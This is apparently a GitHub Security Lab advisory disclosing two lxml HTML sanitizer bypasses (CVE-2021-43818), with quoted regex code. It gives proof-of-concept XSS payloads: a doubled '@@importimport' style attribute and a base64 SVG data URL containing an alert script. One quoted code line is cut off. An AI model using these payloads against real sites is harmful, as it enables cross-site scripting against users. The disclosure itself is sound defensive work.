skip to content
Back to
Home Research Advisories CodeQL Wall of Fame Get Involved Events
January 12, 2022

GHSL-2021-1037_GHSL-2021-1038: Improper sanitization of data URLs and style attributes in lxml HTML Sanitizer - CVE-2021-43818

Alvaro Munoz

Coordinated Disclosure Timeline


The lxml HTML sanitizer fails to properly sanitize data URLs and style attributes



Tested Version

Latest at the time of reporting


Issue 1: Improper sanitization of inline style attributes (GHSL-2021-1037)

The code responsible for cleaning in-line style attributes looks like:

if not self.inline_style:
    for el in _find_styled_elements(doc):
        old = el.get('style')
        new = _css_javascript_re.sub('', old)
        new = _css_import_re.sub('', new)
        if self._has_sneaky_javascript(new):
            # Something tricky is going on...
            del el.attrib['style']
        elif new != old:
            el.set('style', new)

This code uses the following regexps to remove import statements and expression calls:

_css_javascript_re = re.compile(r'expression\s*\(.*?\)', re.S|re.I)
_css_import_re = re.compile(r'@\s*import', re.I)

However, the regexp substitutions can be used to reintroduce dangerous expressions:

<div style="@@importimport url('chrome://communicator/skin/');"></div>

This issue has lower priority since XSS vectors on CSS styles do not normally work on modern browsers.


This issue may lead to Cross-Site Scripting

Issue 2: Improper sanitization of data URL images (GHSL-2021-1038)

When lxml rewrites links, it uses the following regexps to identify possibly malicious schemes:

_is_image_dataurl = re.compile(
    r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
def _is_javascript_scheme(s):
    if _is_image_dataurl(s):
        return None
    return _is_possibly_malicious_scheme(s)

Because r'^data:image/.+;base64', re.I).search allows data URLs as long as they are images, it is possible to use data:image/svg+xml;base64, URLs with embedded javascript code within the SVG image:

<a href="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">asdf</a>

Right-clicking the link and opening it in a new tab will trigger the execution of the javascript code.


This issue may lead to Cross-Site Scripting




These issues were discovered and reported by GitHub Security Lab team member @pwntester (Alvaro Muñoz).


You can contact the GHSL team at, please include a reference to GHSL-2021-1037 or GHSL-2021-1038 in any communication regarding these issues.